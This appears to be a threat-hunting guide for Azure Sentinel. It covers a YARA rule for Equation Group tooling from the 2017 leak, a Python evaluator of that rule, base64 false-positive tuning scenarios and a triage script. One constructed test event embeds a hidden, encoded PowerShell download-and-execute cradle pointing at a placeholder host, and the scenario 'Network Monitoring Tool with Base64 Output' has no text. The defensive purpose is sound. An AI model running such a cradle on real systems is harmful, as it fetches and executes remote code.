The hypothesis is that a match on the YARA rule below (EquationGroup Tool - April Leak, covering tooling from the April 2017 Shadow Brokers "Lost in Translation" release) indicates that an Equation Group implant or utility is present on a host, which in turn suggests a sophisticated adversary has already established a foothold in the network. SOC teams should proactively hunt for these matches in Azure Sentinel so that such a compromise is identified and contained at an early stage.
YARA Rule
rule EquationGroup_Toolset_Apr17_DiBa_Target {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
   strings:
      $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } /* pop r10..rax; add rsp, imm8: generic x64 register-restore epilogue */
      $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } /* xor rax,rax; mov al,[rcx]; add rax,r9; mul r8; mov ...: byte-transform loop */
      $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } /* mul r8b; add rax,r9; mov [rcx],al: tail of the same loop */
   condition:
      /* PE ("MZ") header, under 2000 KB, and all three opcode sequences present */
      ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
}
This rule contains three hex string patterns in its detection logic, and a file matches only when all three are present, the file starts with the MZ (PE) header, and it is smaller than 2000 KB. $op1 on its own is a common x64 function epilogue, so the conjunction of all three patterns is what gives the rule its precision. It can be deployed wherever YARA is run, that is, against files on disk or against process memory. The tuning scenarios below are written against process-execution telemetry (command lines carrying base64-encoded data) rather than against file content; use them as secondary triage of the process that wrote or loaded a flagged file, and tune the YARA hit itself on the flagged file's path, signer and hash.
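For triage on a host without a yara binary, the rule's condition can be reproduced in a few lines. The script below is an added example (not part of the original rule or of signature-base): it applies the MZ check, the size cap and the three hex strings exactly as the rule does, reports each intermediate result, and compares the file's SHA-256 with hash1. The sample buffers it scans are constructed, not real binaries, and deliberately include a PE that carries only $op1 to show why "all of them" matters.

```python
"""Pure-Python evaluation of the EquationGroup_Toolset_Apr17_DiBa_Target condition.

Added example for triage hosts without a yara binary; it is not part of the
original rule or of signature-base. Sample inputs below are constructed.
"""
import hashlib

# Hex strings copied from the rule. $op1 disassembles to pop r10..rax; add rsp, imm8
# (a generic x64 register-restore epilogue), which is why the rule requires all three.
OPCODE_PATTERNS = {
    "$op1": bytes.fromhex("415a415941585f5e5d5a595b584883c4"),
    "$op2": bytes.fromhex("f94803fa4833c08a014903c149f7e088"),
    "$op3": bytes.fromhex("0141f6e04903c188014833"),
}
MAX_SIZE = 2000 * 1024          # YARA's "filesize < 2000KB" (KB = 1024 bytes)
KNOWN_HASH = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"  # hash1


def evaluate(data: bytes) -> dict:
    """Mirror the rule's condition and return every intermediate check for triage."""
    hits = {name: pat in data for name, pat in OPCODE_PATTERNS.items()}
    checks = {
        # uint16(0) == 0x5a4d reads the first two bytes little-endian: "MZ"
        "mz_header": data[:2] == b"MZ",
        "filesize_ok": len(data) < MAX_SIZE,
        "strings": hits,
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    checks["matches"] = checks["mz_header"] and checks["filesize_ok"] and all(hits.values())
    checks["is_known_sample"] = checks["sha256"] == KNOWN_HASH  # hash1 from the rule
    return checks


def build_sample(include: tuple, mz: bool = True, pad: int = 4096) -> bytes:
    """Constructed input (not a real binary): a header, zero padding, and the chosen
    opcode patterns spliced in at separate offsets separated by NOP sleds."""
    buf = bytearray(b"MZ" if mz else b"\x7fELF")
    buf += b"\x00" * pad
    for name in include:
        buf += OPCODE_PATTERNS[name] + b"\x90" * 64
    return bytes(buf)


def demo() -> dict:
    """Run the four cases a rule tuner cares about; values say whether the rule fires."""
    all_three = ("$op1", "$op2", "$op3")
    return {
        "pe_all_patterns": evaluate(build_sample(all_three))["matches"],
        "pe_epilogue_only": evaluate(build_sample(("$op1",)))["matches"],
        "non_pe_all_patterns": evaluate(build_sample(all_three, mz=False))["matches"],
        "pe_too_large": evaluate(build_sample(all_three, pad=MAX_SIZE))["matches"],
    }


if __name__ == "__main__":
    for case, fired in demo().items():
        print(f"{case:22} -> {'MATCH' if fired else 'no match'}")
```

Only the first case fires; the epilogue-only PE, the non-PE file and the oversized PE all fall through one of the rule's guards. Where yara is installed, the equivalent scan is simply `yara -r <rulefile> <directory>`; the point of the script is to show which guard a near-miss failed on, which the yara CLI does not report.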
Scenario: Scheduled System Maintenance Task
Description: A legitimate scheduled task (registered with schtasks.exe or Task Scheduler) runs a maintenance script whose command line includes base64-encoded arguments or similar patterns.
Filter/Exclusion: Check for ProcessName schtasks.exe running from C:\Windows\System32\schtasks.exe (there is no sched.exe in System32), and verify that the task action's command line references a known maintenance script. A task action can launch any binary, so a ProcessName substring alone is not a safe exclusion.
Scenario: Admin Using PowerShell for Script Execution
Description: An administrator uses PowerShell (powershell.exe) to run a script that contains base64-encoded data as part of a legitimate automation or configuration task.
Filter/Exclusion: Filter by ProcessName powershell.exe only when the full image path is C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and the command line references a known admin script; a renamed or relocated copy of powershell.exe must not be excluded.
Scenario: Logon Script Execution
Description: A logon script delivered via Group Policy or a local user profile uses base64-encoded commands for user-specific configuration or deployment.
Filter/Exclusion: Filter by ProcessName cmd.exe (or the script host, wscript.exe or cscript.exe) running from C:\Windows\System32\, and verify the script path against the configured logon script (for Group Policy, a path under the domain SYSVOL share). gpresult.exe only reports applied policy and does not execute logon scripts, so it is not a useful exclusion key.
Scenario: Data Encoding in Application Logs
Description: A legitimate application (e.g., logparser.exe, eventvwr.exe, or wbemtest.exe) encodes data as base64 for logging or debugging purposes.
Filter/Exclusion: Filter by ProcessName logparser.exe, eventvwr.exe, or wbemtest.exe, and verify that the command line is consistent with known logging or debugging usage. Because eventvwr.exe is also a well-known living-off-the-land target, check the parent process and any child process it spawns before excluding it.
Scenario: Network Monitoring Tool with Base64 Output
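Every scenario above keys its exclusion on a ProcessName substring and a path-like string, both of which an adversary controls. The script below is an added example, not from the page: it triages constructed Sentinel-style process events by detecting a base64-looking argument, decoding it for the analyst (PowerShell's -EncodedCommand is UTF-16LE), and suppressing the event only when the full image path, the parent image and a referenced script path all appear together in a verified allowlist. The allowlist entries, the script paths and the four sample events are hypothetical; the field mapping to SecurityEvent and DeviceProcessEvents columns is noted in the comments.

```python
"""Triage of base64-bearing command lines against the false-positive scenarios,
run over constructed Microsoft Sentinel-style process events.

Added example, not from the page; allowlist entries and events are hypothetical.
"""
import base64
import re
from dataclasses import dataclass

# A base64 run of 40+ characters that is not part of a longer token.
B64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
# Local (C:\...) or UNC (\\server\...) script paths referenced on the command line.
SCRIPT_REF = re.compile(r"(?:[A-Za-z]:|\\\\)[^\s\"']+\.(?:ps1|bat|cmd|vbs)", re.IGNORECASE)

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Hypothetical allowlist of (image path, script path, parent image path) triples an
# analyst has verified. Keying on full paths rather than a ProcessName substring is
# what keeps a renamed or relocated powershell.exe from being suppressed.
ALLOWLIST = {
    (PS_PATH, r"C:\Scripts\Maint\cleanup.ps1",
     r"C:\Windows\System32\svchost.exe"),        # scheduled maintenance task
    (r"C:\Windows\System32\cmd.exe",
     r"\\corp.example\SYSVOL\corp.example\scripts\logon.cmd",
     r"C:\Windows\System32\userinit.exe"),       # logon script
}


@dataclass
class ProcEvent:
    image: str     # SecurityEvent NewProcessName / DeviceProcessEvents FolderPath
    parent: str    # ParentProcessName / InitiatingProcessFolderPath
    cmdline: str   # CommandLine / ProcessCommandLine


@dataclass
class Verdict:
    action: str    # "ignore" (no base64), "suppress" (allowlisted) or "review"
    reason: str
    decoded: str = ""


def decode_blob(blob: str) -> str:
    """Decode for the analyst: -EncodedCommand payloads are UTF-16LE, else try UTF-8."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            return text
    return raw.hex()


def classify(ev: ProcEvent) -> Verdict:
    blobs = B64_BLOB.findall(ev.cmdline)
    if not blobs:
        return Verdict("ignore", "no base64-looking argument")
    decoded = decode_blob(blobs[0])
    scripts = {s.lower() for s in SCRIPT_REF.findall(ev.cmdline)}
    for image, script, parent in ALLOWLIST:
        if (ev.image.lower() == image.lower() and ev.parent.lower() == parent.lower()
                and script.lower() in scripts):
            return Verdict("suppress", f"allowlisted {script} under {parent}", decoded)
    return Verdict("review", "base64 argument outside the allowlist", decoded)


def b64ps(script: str) -> str:
    """Build a PowerShell-style -EncodedCommand argument (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [  # constructed events, not real telemetry
    ProcEvent(PS_PATH, r"C:\Windows\System32\svchost.exe",
              f"powershell.exe -NoProfile -File C:\\Scripts\\Maint\\cleanup.ps1 -Config {b64ps('Write-Host maintenance')}"),
    ProcEvent(PS_PATH, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              f"powershell.exe -nop -w hidden -enc {b64ps(DOWNLOAD_CRADLE)}"),
    ProcEvent(r"C:\Users\Public\powershell.exe", r"C:\Windows\System32\svchost.exe",
              f"powershell.exe -File C:\\Scripts\\Maint\\cleanup.ps1 -Config {b64ps('Write-Host maintenance')}"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\userinit.exe",
              r"cmd.exe /c \\corp.example\SYSVOL\corp.example\scripts\logon.cmd"),
]


def triage(events=SAMPLE_EVENTS) -> list:
    """Verdict action per event, in input order."""
    return [classify(e).action for e in events]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        v = classify(ev)
        print(f"{v.action:8} {ev.image} :: {v.reason}")
```

The first event (the real powershell.exe, launched by the Schedule service's svchost.exe, running the allowlisted script) is suppressed; the same script run from a copy of powershell.exe in C:\Users\Public is not, and neither is the hidden-window download cradle launched from WINWORD.EXE, whose decoded text is surfaced in the verdict for the analyst. The logon-script event carries no base64 at all and is left alone, which is the behaviour a ProcessName-only filter would get wrong in both directions.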